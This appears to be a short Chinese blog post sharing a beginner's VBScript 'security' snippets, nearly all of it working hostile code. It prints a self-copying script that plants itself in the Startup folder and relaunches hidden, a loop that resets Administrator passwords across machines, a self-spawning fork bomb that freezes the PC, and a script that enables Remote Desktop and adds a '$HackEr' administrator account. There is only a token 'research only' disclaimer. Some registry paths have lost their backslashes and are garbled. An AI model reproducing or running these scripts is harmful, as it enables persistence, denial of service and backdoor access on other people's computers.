set fso = createobject("scripting.filesystemobject") set ws = createobject("wscript.shell") Msgbox"Messed up" pt = ws.specialfolders("startup") & "" set file = fso.getfile(wscript.scriptfullname) file.copy pt set copy1=createobject("scripting.filesystemobject") copy1.getfile(wscript.scriptfullname).copy("E:huan.vbs") Dim delayer Set delayer = CreateObject("WScript.Shell") WScript.sleep 10 delayer.Run """E:huan.vbs""", 0, FALSE
注册到启动项,可以通过win+X-->运行 msconfig 进入 启动-->任务管理器 禁用 或者 直接删除源文件停止。
第一次尝试VBscript,发现这玩意儿做安全实在是好用,不过,不能乱玩儿,容易出事儿....
比如:修改Admin的密码
Dim WshShell, oExec Set wshShell = CreateObject("WScript.Shell") Set objFSO = CreateObject("Scripting.FileSystemObject") Set objInputFile = objFSO.OpenTextFile("D: estcomputer.txt",1) do until objInputFile.AtEndofStream strcomputer = objInputFile.ReadLine Set objUser = GetObject("WinNT://" & strComputer & "/Administrator, user") objUser.SetPassword "new password" objUser.SetInfo loop
比如:卡死电脑
Do CreateObject("WScript.Shell").Run Chr(34) & WScript.ScriptFullName & Chr(34) Loop
再比如:开启远程桌面
on error resume next const HKEY_LOCAL_MACHINE = &H80000002 strComputer = "." Set StdOut = WScript.StdOut Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\" &_ strComputer & " ootdefault:StdRegProv") strKeyPath = "SYSTEMCurrentControlSetControlTerminal Server" oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath strKeyPath = "SYSTEMCurrentControlSetControlTerminal ServerWds dpwdTds cp" oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath strKeyPath = "SYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" strKeyPath = "SYSTEMCurrentControlSetControlTerminal Server" strValueName = "fDenyTSConnections" dwValue = 0 oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue strKeyPath = "SYSTEMCurrentControlSetControlTerminal ServerWds dpwdTds cp" strValueName = "PortNumber" dwValue = 3389 oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue strKeyPath = "SYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" strValueName = "PortNumber" dwValue = 3389 oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue on error resume next dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="$HackEr":password="393214425":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)*wscript.echo of.ADsPath
(仅用于研究,请勿乱用,自己电脑实验请忽略)